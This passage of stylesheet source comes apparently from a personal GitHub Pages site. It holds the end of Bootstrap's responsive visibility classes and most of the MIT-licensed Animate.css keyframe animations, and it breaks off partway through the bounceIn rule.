} .visible-xs, .visible-sm, .visible-md, .visible-lg { display: none !important; } .visible-xs-block, .visible-xs-inline, .visible-xs-inline-block, .visible-sm-block, .visible-sm-inline, .visible-sm-inline-block, .visible-md-block, .visible-md-inline, .visible-md-inline-block, .visible-lg-block, .visible-lg-inline, .visible-lg-inline-block { display: none !important; } @media (max-width: 767px) { .visible-xs { display: block !important; } table.visible-xs { display: table; } tr.visible-xs { display: table-row !important; } th.visible-xs, td.visible-xs { display: table-cell !important; } } @media (max-width: 767px) { .visible-xs-block { display: block !important; } } @media (max-width: 767px) { .visible-xs-inline { display: inline !important; } } @media (max-width: 767px) { .visible-xs-inline-block { display: inline-block !important; } } @media (min-width: 768px) and (max-width: 991px) { .visible-sm { display: block !important; } table.visible-sm { display: table; } tr.visible-sm { display: table-row !important; } th.visible-sm, td.visible-sm { display: table-cell !important; } } @media (min-width: 768px) and (max-width: 991px) { .visible-sm-block { display: block !important; } } @media (min-width: 768px) and (max-width: 991px) { .visible-sm-inline { display: inline !important; } } @media (min-width: 768px) and (max-width: 991px) { .visible-sm-inline-block { display: inline-block !important; } } @media (min-width: 992px) and (max-width: 1199px) { .visible-md { display: block !important; } table.visible-md { display: table; } tr.visible-md { display: table-row !important; } th.visible-md, td.visible-md { display: table-cell !important; } } @media (min-width: 992px) and (max-width: 1199px) { .visible-md-block { display: block !important; } } @media (min-width: 992px) and (max-width: 1199px) { .visible-md-inline { display: inline !important; } } @media (min-width: 992px) and (max-width: 1199px) { .visible-md-inline-block { display: inline-block !important; } } @media (min-width: 1200px) { .visible-lg { display: block !important; } table.visible-lg { display: table; } tr.visible-lg { display: table-row !important; } th.visible-lg, td.visible-lg { display: table-cell !important; } } @media (min-width: 1200px) { .visible-lg-block { display: block !important; } } @media (min-width: 1200px) { .visible-lg-inline { display: inline !important; } } @media (min-width: 1200px) { .visible-lg-inline-block { display: inline-block !important; } } @media (max-width: 767px) { .hidden-xs { display: none !important; } } @media (min-width: 768px) and (max-width: 991px) { .hidden-sm { display: none !important; } } @media (min-width: 992px) and (max-width: 1199px) { .hidden-md { display: none !important; } } @media (min-width: 1200px) { .hidden-lg { display: none !important; } } .visible-print { display: none !important; } @media print { .visible-print { display: block !important; } table.visible-print { display: table; } tr.visible-print { display: table-row !important; } th.visible-print, td.visible-print { display: table-cell !important; } } .visible-print-block { display: none !important; } @media print { .visible-print-block { display: block !important; } } .visible-print-inline { display: none !important; } @media print { .visible-print-inline { display: inline !important; } } .visible-print-inline-block { display: none !important; } @media print { .visible-print-inline-block { display: inline-block !important; } } @media print { .hidden-print { display: none !important; } } a { text-decoration: none; } /*# sourceMappingURL=bootstrap.css.map */
css/animate.css
mchateloin/mchateloin.github.io
@charset "UTF-8"; /* Animate.css - http://daneden.me/animate Licensed under the ☺ license (http://licence.visualidiot.com/) Copyright (c) 2012 Dan Eden Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ .animated { -webkit-animation-duration: 1s; -moz-animation-duration: 1s; -o-animation-duration: 1s; animation-duration: 1s; -webkit-animation-fill-mode: both; -moz-animation-fill-mode: both; -o-animation-fill-mode: both; animation-fill-mode: both; } .animated.hinge { -webkit-animation-duration: 2s; -moz-animation-duration: 2s; -o-animation-duration: 2s; animation-duration: 2s; } @-webkit-keyframes flash { 0%, 50%, 100% {opacity: 1;} 25%, 75% {opacity: 0;} } @-moz-keyframes flash { 0%, 50%, 100% {opacity: 1;} 25%, 75% {opacity: 0;} } @-o-keyframes flash { 0%, 50%, 100% {opacity: 1;} 25%, 75% {opacity: 0;} } @keyframes flash { 0%, 50%, 100% {opacity: 1;} 25%, 75% {opacity: 0;} } .flash { -webkit-animation-name: flash; -moz-animation-name: flash; -o-animation-name: flash; animation-name: flash; } @-webkit-keyframes shake { 0%, 100% {-webkit-transform: translateX(0);} 10%, 30%, 50%, 70%, 90% {-webkit-transform: translateX(-10px);} 20%, 40%, 60%, 80% {-webkit-transform: translateX(10px);} } @-moz-keyframes shake { 0%, 100% {-moz-transform: translateX(0);} 10%, 30%, 50%, 70%, 90% {-moz-transform: translateX(-10px);} 20%, 40%, 60%, 80% {-moz-transform: translateX(10px);} } @-o-keyframes shake { 0%, 100% {-o-transform: translateX(0);} 10%, 30%, 50%, 70%, 90% {-o-transform: translateX(-10px);} 20%, 40%, 60%, 80% {-o-transform: translateX(10px);} } @keyframes shake { 0%, 100% {transform: translateX(0);} 10%, 30%, 50%, 70%, 90% {transform: translateX(-10px);} 20%, 40%, 60%, 80% {transform: translateX(10px);} } .shake { -webkit-animation-name: shake; -moz-animation-name: shake; -o-animation-name: shake; animation-name: shake; } @-webkit-keyframes bounce { 0%, 20%, 50%, 80%, 100% {-webkit-transform: translateY(0);} 40% {-webkit-transform: translateY(-30px);} 60% {-webkit-transform: translateY(-15px);} } @-moz-keyframes bounce { 0%, 20%, 50%, 80%, 100% {-moz-transform: translateY(0);} 40% {-moz-transform: translateY(-30px);} 60% {-moz-transform: translateY(-15px);} } @-o-keyframes bounce { 0%, 20%, 50%, 80%, 100% {-o-transform: translateY(0);} 40% {-o-transform: translateY(-30px);} 60% {-o-transform: translateY(-15px);} } @keyframes bounce { 0%, 20%, 50%, 80%, 100% {transform: translateY(0);} 40% {transform: translateY(-30px);} 60% {transform: translateY(-15px);} } .bounce { -webkit-animation-name: bounce; -moz-animation-name: bounce; -o-animation-name: bounce; animation-name: bounce; } @-webkit-keyframes tada { 0% {-webkit-transform: scale(1);} 10%, 20% {-webkit-transform: scale(0.9) rotate(-3deg);} 30%, 50%, 70%, 90% {-webkit-transform: scale(1.1) rotate(3deg);} 40%, 60%, 80% {-webkit-transform: scale(1.1) rotate(-3deg);} 100% {-webkit-transform: scale(1) rotate(0);} } @-moz-keyframes tada { 0% {-moz-transform: scale(1);} 10%, 20% {-moz-transform: scale(0.9) rotate(-3deg);} 30%, 50%, 70%, 90% {-moz-transform: scale(1.1) rotate(3deg);} 40%, 60%, 80% {-moz-transform: scale(1.1) rotate(-3deg);} 100% {-moz-transform: scale(1) rotate(0);} } @-o-keyframes tada { 0% {-o-transform: scale(1);} 10%, 20% {-o-transform: scale(0.9) rotate(-3deg);} 30%, 50%, 70%, 90% {-o-transform: scale(1.1) rotate(3deg);} 40%, 60%, 80% {-o-transform: scale(1.1) rotate(-3deg);} 100% {-o-transform: scale(1) rotate(0);} } @keyframes tada { 0% {transform: scale(1);} 10%, 20% {transform: scale(0.9) rotate(-3deg);} 30%, 50%, 70%, 90% {transform: scale(1.1) rotate(3deg);} 40%, 60%, 80% {transform: scale(1.1) rotate(-3deg);} 100% {transform: scale(1) rotate(0);} } .tada { -webkit-animation-name: tada; -moz-animation-name: tada; -o-animation-name: tada; animation-name: tada; } @-webkit-keyframes swing { 20%, 40%, 60%, 80%, 100% { -webkit-transform-origin: top center; } 20% { -webkit-transform: rotate(15deg); } 40% { -webkit-transform: rotate(-10deg); } 60% { -webkit-transform: rotate(5deg); } 80% { -webkit-transform: rotate(-5deg); } 100% { -webkit-transform: rotate(0deg); } } @-moz-keyframes swing { 20% { -moz-transform: rotate(15deg); } 40% { -moz-transform: rotate(-10deg); } 60% { -moz-transform: rotate(5deg); } 80% { -moz-transform: rotate(-5deg); } 100% { -moz-transform: rotate(0deg); } } @-o-keyframes swing { 20% { -o-transform: rotate(15deg); } 40% { -o-transform: rotate(-10deg); } 60% { -o-transform: rotate(5deg); } 80% { -o-transform: rotate(-5deg); } 100% { -o-transform: rotate(0deg); } } @keyframes swing { 20% { transform: rotate(15deg); } 40% { transform: rotate(-10deg); } 60% { transform: rotate(5deg); } 80% { transform: rotate(-5deg); } 100% { transform: rotate(0deg); } } .swing { -webkit-transform-origin: top center; -moz-transform-origin: top center; -o-transform-origin: top center; transform-origin: top center; -webkit-animation-name: swing; -moz-animation-name: swing; -o-animation-name: swing; animation-name: swing; } /* originally authored by Nick Pettit - https://github.com/nickpettit/glide */ @-webkit-keyframes wobble { 0% { -webkit-transform: translateX(0%); } 15% { -webkit-transform: translateX(-25%) rotate(-5deg); } 30% { -webkit-transform: translateX(20%) rotate(3deg); } 45% { -webkit-transform: translateX(-15%) rotate(-3deg); } 60% { -webkit-transform: translateX(10%) rotate(2deg); } 75% { -webkit-transform: translateX(-5%) rotate(-1deg); } 100% { -webkit-transform: translateX(0%); } } @-moz-keyframes wobble { 0% { -moz-transform: translateX(0%); } 15% { -moz-transform: translateX(-25%) rotate(-5deg); } 30% { -moz-transform: translateX(20%) rotate(3deg); } 45% { -moz-transform: translateX(-15%) rotate(-3deg); } 60% { -moz-transform: translateX(10%) rotate(2deg); } 75% { -moz-transform: translateX(-5%) rotate(-1deg); } 100% { -moz-transform: translateX(0%); } } @-o-keyframes wobble { 0% { -o-transform: translateX(0%); } 15% { -o-transform: translateX(-25%) rotate(-5deg); } 30% { -o-transform: translateX(20%) rotate(3deg); } 45% { -o-transform: translateX(-15%) rotate(-3deg); } 60% { -o-transform: translateX(10%) rotate(2deg); } 75% { -o-transform: translateX(-5%) rotate(-1deg); } 100% { -o-transform: translateX(0%); } } @keyframes wobble { 0% { transform: translateX(0%); } 15% { transform: translateX(-25%) rotate(-5deg); } 30% { transform: translateX(20%) rotate(3deg); } 45% { transform: translateX(-15%) rotate(-3deg); } 60% { transform: translateX(10%) rotate(2deg); } 75% { transform: translateX(-5%) rotate(-1deg); } 100% { transform: translateX(0%); } } .wobble { -webkit-animation-name: wobble; -moz-animation-name: wobble; -o-animation-name: wobble; animation-name: wobble; } /* originally authored by Nick Pettit - https://github.com/nickpettit/glide */ @-webkit-keyframes pulse { 0% { -webkit-transform: scale(1); } 50% { -webkit-transform: scale(1.1); } 100% { -webkit-transform: scale(1); } } @-moz-keyframes pulse { 0% { -moz-transform: scale(1); } 50% { -moz-transform: scale(1.1); } 100% { -moz-transform: scale(1); } } @-o-keyframes pulse { 0% { -o-transform: scale(1); } 50% { -o-transform: scale(1.1); } 100% { -o-transform: scale(1); } } @keyframes pulse { 0% { transform: scale(1); } 50% { transform: scale(1.1); } 100% { transform: scale(1); } } .pulse { -webkit-animation-name: pulse; -moz-animation-name: pulse; -o-animation-name: pulse; animation-name: pulse; } @-webkit-keyframes flip { 0% { -webkit-transform: perspective(400px) rotateY(0); -webkit-animation-timing-function: ease-out; } 40% { -webkit-transform: perspective(400px) translateZ(150px) rotateY(170deg); -webkit-animation-timing-function: ease-out; } 50% { -webkit-transform: perspective(400px) translateZ(150px) rotateY(190deg) scale(1); -webkit-animation-timing-function: ease-in; } 80% { -webkit-transform: perspective(400px) rotateY(360deg) scale(.95); -webkit-animation-timing-function: ease-in; } 100% { -webkit-transform: perspective(400px) scale(1); -webkit-animation-timing-function: ease-in; } } @-moz-keyframes flip { 0% { -moz-transform: perspective(400px) rotateY(0); -moz-animation-timing-function: ease-out; } 40% { -moz-transform: perspective(400px) translateZ(150px) rotateY(170deg); -moz-animation-timing-function: ease-out; } 50% { -moz-transform: perspective(400px) translateZ(150px) rotateY(190deg) scale(1); -moz-animation-timing-function: ease-in; } 80% { -moz-transform: perspective(400px) rotateY(360deg) scale(.95); -moz-animation-timing-function: ease-in; } 100% { -moz-transform: perspective(400px) scale(1); -moz-animation-timing-function: ease-in; } } @-o-keyframes flip { 0% { -o-transform: perspective(400px) rotateY(0); -o-animation-timing-function: ease-out; } 40% { -o-transform: perspective(400px) translateZ(150px) rotateY(170deg); -o-animation-timing-function: ease-out; } 50% { -o-transform: perspective(400px) translateZ(150px) rotateY(190deg) scale(1); -o-animation-timing-function: ease-in; } 80% { -o-transform: perspective(400px) rotateY(360deg) scale(.95); -o-animation-timing-function: ease-in; } 100% { -o-transform: perspective(400px) scale(1); -o-animation-timing-function: ease-in; } } @keyframes flip { 0% { transform: perspective(400px) rotateY(0); animation-timing-function: ease-out; } 40% { transform: perspective(400px) translateZ(150px) rotateY(170deg); animation-timing-function: ease-out; } 50% { transform: perspective(400px) translateZ(150px) rotateY(190deg) scale(1); animation-timing-function: ease-in; } 80% { transform: perspective(400px) rotateY(360deg) scale(.95); animation-timing-function: ease-in; } 100% { transform: perspective(400px) scale(1); animation-timing-function: ease-in; } } .flip { -webkit-backface-visibility: visible !important; -webkit-animation-name: flip; -moz-backface-visibility: visible !important; -moz-animation-name: flip; -o-backface-visibility: visible !important; -o-animation-name: flip; backface-visibility: visible !important; animation-name: flip; } @-webkit-keyframes flipInX { 0% { -webkit-transform: perspective(400px) rotateX(90deg); opacity: 0; } 40% { -webkit-transform: perspective(400px) rotateX(-10deg); } 70% { -webkit-transform: perspective(400px) rotateX(10deg); } 100% { -webkit-transform: perspective(400px) rotateX(0deg); opacity: 1; } } @-moz-keyframes flipInX { 0% { -moz-transform: perspective(400px) rotateX(90deg); opacity: 0; } 40% { -moz-transform: perspective(400px) rotateX(-10deg); } 70% { -moz-transform: perspective(400px) rotateX(10deg); } 100% { -moz-transform: perspective(400px) rotateX(0deg); opacity: 1; } } @-o-keyframes flipInX { 0% { -o-transform: perspective(400px) rotateX(90deg); opacity: 0; } 40% { -o-transform: perspective(400px) rotateX(-10deg); } 70% { -o-transform: perspective(400px) rotateX(10deg); } 100% { -o-transform: perspective(400px) rotateX(0deg); opacity: 1; } } @keyframes flipInX { 0% { transform: perspective(400px) rotateX(90deg); opacity: 0; } 40% { transform: perspective(400px) rotateX(-10deg); } 70% { transform: perspective(400px) rotateX(10deg); } 100% { transform: perspective(400px) rotateX(0deg); opacity: 1; } } .flipInX { -webkit-backface-visibility: visible !important; -webkit-animation-name: flipInX; -moz-backface-visibility: visible !important; -moz-animation-name: flipInX; -o-backface-visibility: visible !important; -o-animation-name: flipInX; backface-visibility: visible !important; animation-name: flipInX; } @-webkit-keyframes flipOutX { 0% { -webkit-transform: perspective(400px) rotateX(0deg); opacity: 1; } 100% { -webkit-transform: perspective(400px) rotateX(90deg); opacity: 0; } } @-moz-keyframes flipOutX { 0% { -moz-transform: perspective(400px) rotateX(0deg); opacity: 1; } 100% { -moz-transform: perspective(400px) rotateX(90deg); opacity: 0; } } @-o-keyframes flipOutX { 0% { -o-transform: perspective(400px) rotateX(0deg); opacity: 1; } 100% { -o-transform: perspective(400px) rotateX(90deg); opacity: 0; } } @keyframes flipOutX { 0% { transform: perspective(400px) rotateX(0deg); opacity: 1; } 100% { transform: perspective(400px) rotateX(90deg); opacity: 0; } } .flipOutX { -webkit-animation-name: flipOutX; -webkit-backface-visibility: visible !important; -moz-animation-name: flipOutX; -moz-backface-visibility: visible !important; -o-animation-name: flipOutX; -o-backface-visibility: visible !important; animation-name: flipOutX; backface-visibility: visible !important; } @-webkit-keyframes flipInY { 0% { -webkit-transform: perspective(400px) rotateY(90deg); opacity: 0; } 40% { -webkit-transform: perspective(400px) rotateY(-10deg); } 70% { -webkit-transform: perspective(400px) rotateY(10deg); } 100% { -webkit-transform: perspective(400px) rotateY(0deg); opacity: 1; } } @-moz-keyframes flipInY { 0% { -moz-transform: perspective(400px) rotateY(90deg); opacity: 0; } 40% { -moz-transform: perspective(400px) rotateY(-10deg); } 70% { -moz-transform: perspective(400px) rotateY(10deg); } 100% { -moz-transform: perspective(400px) rotateY(0deg); opacity: 1; } } @-o-keyframes flipInY { 0% { -o-transform: perspective(400px) rotateY(90deg); opacity: 0; } 40% { -o-transform: perspective(400px) rotateY(-10deg); } 70% { -o-transform: perspective(400px) rotateY(10deg); } 100% { -o-transform: perspective(400px) rotateY(0deg); opacity: 1; } } @keyframes flipInY { 0% { transform: perspective(400px) rotateY(90deg); opacity: 0; } 40% { transform: perspective(400px) rotateY(-10deg); } 70% { transform: perspective(400px) rotateY(10deg); } 100% { transform: perspective(400px) rotateY(0deg); opacity: 1; } } .flipInY { -webkit-backface-visibility: visible !important; -webkit-animation-name: flipInY; -moz-backface-visibility: visible !important; -moz-animation-name: flipInY; -o-backface-visibility: visible !important; -o-animation-name: flipInY; backface-visibility: visible !important; animation-name: flipInY; } @-webkit-keyframes flipOutY { 0% { -webkit-transform: perspective(400px) rotateY(0deg); opacity: 1; } 100% { -webkit-transform: perspective(400px) rotateY(90deg); opacity: 0; } } @-moz-keyframes flipOutY { 0% { -moz-transform: perspective(400px) rotateY(0deg); opacity: 1; } 100% { -moz-transform: perspective(400px) rotateY(90deg); opacity: 0; } } @-o-keyframes flipOutY { 0% { -o-transform: perspective(400px) rotateY(0deg); opacity: 1; } 100% { -o-transform: perspective(400px) rotateY(90deg); opacity: 0; } } @keyframes flipOutY { 0% { transform: perspective(400px) rotateY(0deg); opacity: 1; } 100% { transform: perspective(400px) rotateY(90deg); opacity: 0; } } .flipOutY { -webkit-backface-visibility: visible !important; -webkit-animation-name: flipOutY; -moz-backface-visibility: visible !important; -moz-animation-name: flipOutY; -o-backface-visibility: visible !important; -o-animation-name: flipOutY; backface-visibility: visible !important; animation-name: flipOutY; } @-webkit-keyframes fadeIn { 0% {opacity: 0;} 100% {opacity: 1;} } @-moz-keyframes fadeIn { 0% {opacity: 0;} 100% {opacity: 1;} } @-o-keyframes fadeIn { 0% {opacity: 0;} 100% {opacity: 1;} } @keyframes fadeIn { 0% {opacity: 0;} 100% {opacity: 1;} } .fadeIn { -webkit-animation-name: fadeIn; -moz-animation-name: fadeIn; -o-animation-name: fadeIn; animation-name: fadeIn; } @-webkit-keyframes fadeInUp { 0% { opacity: 0; -webkit-transform: translateY(20px); } 100% { opacity: 1; -webkit-transform: translateY(0); } } @-moz-keyframes fadeInUp { 0% { opacity: 0; -moz-transform: translateY(20px); } 100% { opacity: 1; -moz-transform: translateY(0); } } @-o-keyframes fadeInUp { 0% { opacity: 0; -o-transform: translateY(20px); } 100% { opacity: 1; -o-transform: translateY(0); } } @keyframes fadeInUp { 0% { opacity: 0; transform: translateY(20px); } 100% { opacity: 1; transform: translateY(0); } } .fadeInUp { -webkit-animation-name: fadeInUp; -moz-animation-name: fadeInUp; -o-animation-name: fadeInUp; animation-name: fadeInUp; } @-webkit-keyframes fadeInDown { 0% { opacity: 0; -webkit-transform: translateY(-20px); } 100% { opacity: 1; -webkit-transform: translateY(0); } } @-moz-keyframes fadeInDown { 0% { opacity: 0; -moz-transform: translateY(-20px); } 100% { opacity: 1; -moz-transform: translateY(0); } } @-o-keyframes fadeInDown { 0% { opacity: 0; -o-transform: translateY(-20px); } 100% { opacity: 1; -o-transform: translateY(0); } } @keyframes fadeInDown { 0% { opacity: 0; transform: translateY(-20px); } 100% { opacity: 1; transform: translateY(0); } } .fadeInDown { -webkit-animation-name: fadeInDown; -moz-animation-name: fadeInDown; -o-animation-name: fadeInDown; animation-name: fadeInDown; } @-webkit-keyframes fadeInLeft { 0% { opacity: 0; -webkit-transform: translateX(-20px); } 100% { opacity: 1; -webkit-transform: translateX(0); } } @-moz-keyframes fadeInLeft { 0% { opacity: 0; -moz-transform: translateX(-20px); } 100% { opacity: 1; -moz-transform: translateX(0); } } @-o-keyframes fadeInLeft { 0% { opacity: 0; -o-transform: translateX(-20px); } 100% { opacity: 1; -o-transform: translateX(0); } } @keyframes fadeInLeft { 0% { opacity: 0; transform: translateX(-20px); } 100% { opacity: 1; transform: translateX(0); } } .fadeInLeft { -webkit-animation-name: fadeInLeft; -moz-animation-name: fadeInLeft; -o-animation-name: fadeInLeft; animation-name: fadeInLeft; } @-webkit-keyframes fadeInRight { 0% { opacity: 0; -webkit-transform: translateX(20px); } 100% { opacity: 1; -webkit-transform: translateX(0); } } @-moz-keyframes fadeInRight { 0% { opacity: 0; -moz-transform: translateX(20px); } 100% { opacity: 1; -moz-transform: translateX(0); } } @-o-keyframes fadeInRight { 0% { opacity: 0; -o-transform: translateX(20px); } 100% { opacity: 1; -o-transform: translateX(0); } } @keyframes fadeInRight { 0% { opacity: 0; transform: translateX(20px); } 100% { opacity: 1; transform: translateX(0); } } .fadeInRight { -webkit-animation-name: fadeInRight; -moz-animation-name: fadeInRight; -o-animation-name: fadeInRight; animation-name: fadeInRight; } @-webkit-keyframes fadeInUpBig { 0% { opacity: 0; -webkit-transform: translateY(2000px); } 100% { opacity: 1; -webkit-transform: translateY(0); } } @-moz-keyframes fadeInUpBig { 0% { opacity: 0; -moz-transform: translateY(2000px); } 100% { opacity: 1; -moz-transform: translateY(0); } } @-o-keyframes fadeInUpBig { 0% { opacity: 0; -o-transform: translateY(2000px); } 100% { opacity: 1; -o-transform: translateY(0); } } @keyframes fadeInUpBig { 0% { opacity: 0; transform: translateY(2000px); } 100% { opacity: 1; transform: translateY(0); } } .fadeInUpBig { -webkit-animation-name: fadeInUpBig; -moz-animation-name: fadeInUpBig; -o-animation-name: fadeInUpBig; animation-name: fadeInUpBig; } @-webkit-keyframes fadeInDownBig { 0% { opacity: 0; -webkit-transform: translateY(-2000px); } 100% { opacity: 1; -webkit-transform: translateY(0); } } @-moz-keyframes fadeInDownBig { 0% { opacity: 0; -moz-transform: translateY(-2000px); } 100% { opacity: 1; -moz-transform: translateY(0); } } @-o-keyframes fadeInDownBig { 0% { opacity: 0; -o-transform: translateY(-2000px); } 100% { opacity: 1; -o-transform: translateY(0); } } @keyframes fadeInDownBig { 0% { opacity: 0; transform: translateY(-2000px); } 100% { opacity: 1; transform: translateY(0); } } .fadeInDownBig { -webkit-animation-name: fadeInDownBig; -moz-animation-name: fadeInDownBig; -o-animation-name: fadeInDownBig; animation-name: fadeInDownBig; } @-webkit-keyframes fadeInLeftBig { 0% { opacity: 0; -webkit-transform: translateX(-2000px); } 100% { opacity: 1; -webkit-transform: translateX(0); } } @-moz-keyframes fadeInLeftBig { 0% { opacity: 0; -moz-transform: translateX(-2000px); } 100% { opacity: 1; -moz-transform: translateX(0); } } @-o-keyframes fadeInLeftBig { 0% { opacity: 0; -o-transform: translateX(-2000px); } 100% { opacity: 1; -o-transform: translateX(0); } } @keyframes fadeInLeftBig { 0% { opacity: 0; transform: translateX(-2000px); } 100% { opacity: 1; transform: translateX(0); } } .fadeInLeftBig { -webkit-animation-name: fadeInLeftBig; -moz-animation-name: fadeInLeftBig; -o-animation-name: fadeInLeftBig; animation-name: fadeInLeftBig; } @-webkit-keyframes fadeInRightBig { 0% { opacity: 0; -webkit-transform: translateX(2000px); } 100% { opacity: 1; -webkit-transform: translateX(0); } } @-moz-keyframes fadeInRightBig { 0% { opacity: 0; -moz-transform: translateX(2000px); } 100% { opacity: 1; -moz-transform: translateX(0); } } @-o-keyframes fadeInRightBig { 0% { opacity: 0; -o-transform: translateX(2000px); } 100% { opacity: 1; -o-transform: translateX(0); } } @keyframes fadeInRightBig { 0% { opacity: 0; transform: translateX(2000px); } 100% { opacity: 1; transform: translateX(0); } } .fadeInRightBig { -webkit-animation-name: fadeInRightBig; -moz-animation-name: fadeInRightBig; -o-animation-name: fadeInRightBig; animation-name: fadeInRightBig; } @-webkit-keyframes fadeOut { 0% {opacity: 1;} 100% {opacity: 0;} } @-moz-keyframes fadeOut { 0% {opacity: 1;} 100% {opacity: 0;} } @-o-keyframes fadeOut { 0% {opacity: 1;} 100% {opacity: 0;} } @keyframes fadeOut { 0% {opacity: 1;} 100% {opacity: 0;} } .fadeOut { -webkit-animation-name: fadeOut; -moz-animation-name: fadeOut; -o-animation-name: fadeOut; animation-name: fadeOut; } @-webkit-keyframes fadeOutUp { 0% { opacity: 1; -webkit-transform: translateY(0); } 100% { opacity: 0; -webkit-transform: translateY(-20px); } } @-moz-keyframes fadeOutUp { 0% { opacity: 1; -moz-transform: translateY(0); } 100% { opacity: 0; -moz-transform: translateY(-20px); } } @-o-keyframes fadeOutUp { 0% { opacity: 1; -o-transform: translateY(0); } 100% { opacity: 0; -o-transform: translateY(-20px); } } @keyframes fadeOutUp { 0% { opacity: 1; transform: translateY(0); } 100% { opacity: 0; transform: translateY(-20px); } } .fadeOutUp { -webkit-animation-name: fadeOutUp; -moz-animation-name: fadeOutUp; -o-animation-name: fadeOutUp; animation-name: fadeOutUp; } @-webkit-keyframes fadeOutDown { 0% { opacity: 1; -webkit-transform: translateY(0); } 100% { opacity: 0; -webkit-transform: translateY(20px); } } @-moz-keyframes fadeOutDown { 0% { opacity: 1; -moz-transform: translateY(0); } 100% { opacity: 0; -moz-transform: translateY(20px); } } @-o-keyframes fadeOutDown { 0% { opacity: 1; -o-transform: translateY(0); } 100% { opacity: 0; -o-transform: translateY(20px); } } @keyframes fadeOutDown { 0% { opacity: 1; transform: translateY(0); } 100% { opacity: 0; transform: translateY(20px); } } .fadeOutDown { -webkit-animation-name: fadeOutDown; -moz-animation-name: fadeOutDown; -o-animation-name: fadeOutDown; animation-name: fadeOutDown; } @-webkit-keyframes fadeOutLeft { 0% { opacity: 1; -webkit-transform: translateX(0); } 100% { opacity: 0; -webkit-transform: translateX(-20px); } } @-moz-keyframes fadeOutLeft { 0% { opacity: 1; -moz-transform: translateX(0); } 100% { opacity: 0; -moz-transform: translateX(-20px); } } @-o-keyframes fadeOutLeft { 0% { opacity: 1; -o-transform: translateX(0); } 100% { opacity: 0; -o-transform: translateX(-20px); } } @keyframes fadeOutLeft { 0% { opacity: 1; transform: translateX(0); } 100% { opacity: 0; transform: translateX(-20px); } } .fadeOutLeft { -webkit-animation-name: fadeOutLeft; -moz-animation-name: fadeOutLeft; -o-animation-name: fadeOutLeft; animation-name: fadeOutLeft; } @-webkit-keyframes fadeOutRight { 0% { opacity: 1; -webkit-transform: translateX(0); } 100% { opacity: 0; -webkit-transform: translateX(20px); } } @-moz-keyframes fadeOutRight { 0% { opacity: 1; -moz-transform: translateX(0); } 100% { opacity: 0; -moz-transform: translateX(20px); } } @-o-keyframes fadeOutRight { 0% { opacity: 1; -o-transform: translateX(0); } 100% { opacity: 0; -o-transform: translateX(20px); } } @keyframes fadeOutRight { 0% { opacity: 1; transform: translateX(0); } 100% { opacity: 0; transform: translateX(20px); } } .fadeOutRight { -webkit-animation-name: fadeOutRight; -moz-animation-name: fadeOutRight; -o-animation-name: fadeOutRight; animation-name: fadeOutRight; } @-webkit-keyframes fadeOutUpBig { 0% { opacity: 1; -webkit-transform: translateY(0); } 100% { opacity: 0; -webkit-transform: translateY(-2000px); } } @-moz-keyframes fadeOutUpBig { 0% { opacity: 1; -moz-transform: translateY(0); } 100% { opacity: 0; -moz-transform: translateY(-2000px); } } @-o-keyframes fadeOutUpBig { 0% { opacity: 1; -o-transform: translateY(0); } 100% { opacity: 0; -o-transform: translateY(-2000px); } } @keyframes fadeOutUpBig { 0% { opacity: 1; transform: translateY(0); } 100% { opacity: 0; transform: translateY(-2000px); } } .fadeOutUpBig { -webkit-animation-name: fadeOutUpBig; -moz-animation-name: fadeOutUpBig; -o-animation-name: fadeOutUpBig; animation-name: fadeOutUpBig; } @-webkit-keyframes fadeOutDownBig { 0% { opacity: 1; -webkit-transform: translateY(0); } 100% { opacity: 0; -webkit-transform: translateY(2000px); } } @-moz-keyframes fadeOutDownBig { 0% { opacity: 1; -moz-transform: translateY(0); } 100% { opacity: 0; -moz-transform: translateY(2000px); } } @-o-keyframes fadeOutDownBig { 0% { opacity: 1; -o-transform: translateY(0); } 100% { opacity: 0; -o-transform: translateY(2000px); } } @keyframes fadeOutDownBig { 0% { opacity: 1; transform: translateY(0); } 100% { opacity: 0; transform: translateY(2000px); } } .fadeOutDownBig { -webkit-animation-name: fadeOutDownBig; -moz-animation-name: fadeOutDownBig; -o-animation-name: fadeOutDownBig; animation-name: fadeOutDownBig; } @-webkit-keyframes fadeOutLeftBig { 0% { opacity: 1; -webkit-transform: translateX(0); } 100% { opacity: 0; -webkit-transform: translateX(-2000px); } } @-moz-keyframes fadeOutLeftBig { 0% { opacity: 1; -moz-transform: translateX(0); } 100% { opacity: 0; -moz-transform: translateX(-2000px); } } @-o-keyframes fadeOutLeftBig { 0% { opacity: 1; -o-transform: translateX(0); } 100% { opacity: 0; -o-transform: translateX(-2000px); } } @keyframes fadeOutLeftBig { 0% { opacity: 1; transform: translateX(0); } 100% { opacity: 0; transform: translateX(-2000px); } } .fadeOutLeftBig { -webkit-animation-name: fadeOutLeftBig; -moz-animation-name: fadeOutLeftBig; -o-animation-name: fadeOutLeftBig; animation-name: fadeOutLeftBig; } @-webkit-keyframes fadeOutRightBig { 0% { opacity: 1; -webkit-transform: translateX(0); } 100% { opacity: 0; -webkit-transform: translateX(2000px); } } @-moz-keyframes fadeOutRightBig { 0% { opacity: 1; -moz-transform: translateX(0); } 100% { opacity: 0; -moz-transform: translateX(2000px); } } @-o-keyframes fadeOutRightBig { 0% { opacity: 1; -o-transform: translateX(0); } 100% { opacity: 0; -o-transform: translateX(2000px); } } @keyframes fadeOutRightBig { 0% { opacity: 1; transform: translateX(0); } 100% { opacity: 0; transform: translateX(2000px); } } .fadeOutRightBig { -webkit-animation-name: fadeOutRightBig; -moz-animation-name: fadeOutRightBig; -o-animation-name: fadeOutRightBig; animation-name: fadeOutRightBig; } @-webkit-keyframes bounceIn { 0% { opacity: 0; -webkit-transform: scale(.3); } 50% { opacity: 1; -webkit-transform: scale(1.05); } 70% { 